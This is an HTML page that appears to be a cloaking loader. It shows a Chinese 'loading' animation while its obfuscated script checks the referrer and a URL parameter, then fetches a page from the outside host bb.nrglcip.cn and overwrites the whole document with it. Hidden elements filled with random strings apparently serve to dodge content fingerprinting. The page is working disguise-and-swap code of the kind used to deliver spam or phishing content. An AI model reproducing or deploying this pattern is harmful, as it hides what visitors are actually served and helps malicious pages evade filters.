<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ck8ZvS {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ck8ZvS .k4KagpKP {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ck8ZvS .content {
            line-height: 50px;
            text-align: center
        }

        .ck8ZvS .img {
            width: 100%
        }

        .ck8ZvS .kALjgYzu {
            text-align: center
        }

        .ck8ZvS .kALjgYzu span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ck8ZvS .kALjgYzu span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ck8ZvS .kALjgYzu span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ck8ZvS .kALjgYzu span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ck8ZvS .kALjgYzu span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ck8ZvS .kALjgYzu span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ck8ZvS .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function dhsVq0gnh(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var jtOoE5 = dhsVq0gnh('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ jtOoE5 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ jtOoE5 +".html?a=share";
		}
		
        lVf46iKgY=url+"#"+new Date().getTime();
        lVf46iKgY && function() {
            $.get(lVf46iKgY, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>c9inJCxZm5A58dvT6punXdSmKaHlwzybFcQnh5m3QsSAmcJ4WLg62Dq29FI2gynVkRQiGKEBgxZy9fzTPo6Z</p>
<h1 style='display:none' >LhilH4I4z3eLmvnaf78TN78A57B9sCgZEaF2hYCDJ76G4cJsqK1oW7raZOeQbaLvm8AVjoWwhzq4gq7nQsXAxvlisZvrN</h1>
<h1 style='display:none' >LhilH4I4z3eLmvnaf78TN78A57B9sCgZEaF2hYCDJ76G4cJsqK1oW7raZOeQbaLvm8AVjoWwhzq4gq7nQsXAxvlisZvrN</h1>
<h1 style='display:none' >LhilH4I4z3eLmvnaf78TN78A57B9sCgZEaF2hYCDJ76G4cJsqK1oW7raZOeQbaLvm8AVjoWwhzq4gq7nQsXAxvlisZvrN</h1>
<h1 style='display:none' >LhilH4I4z3eLmvnaf78TN78A57B9sCgZEaF2hYCDJ76G4cJsqK1oW7raZOeQbaLvm8AVjoWwhzq4gq7nQsXAxvlisZvrN</h1><div class="ck8ZvS">
    <div class="k4KagpKP">
        <div class="kALjgYzu">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>nLsxHDK0oO2qKTyW5eJNDzxXGkKCSiziWOxkHr7ptcYGt5XWyLBH07kbI7Xn5hQvn3H6jLD</p>
<img  src='' style='display:none'>
<p  style='display:none'>nLsxHDK0oO2qKTyW5eJNDzxXGkKCSiziWOxkHr7ptcYGt5XWyLBH07kbI7Xn5hQvn3H6jLD</p>
<p  style='display:none'>nLsxHDK0oO2qKTyW5eJNDzxXGkKCSiziWOxkHr7ptcYGt5XWyLBH07kbI7Xn5hQvn3H6jLD</p></body>
</html>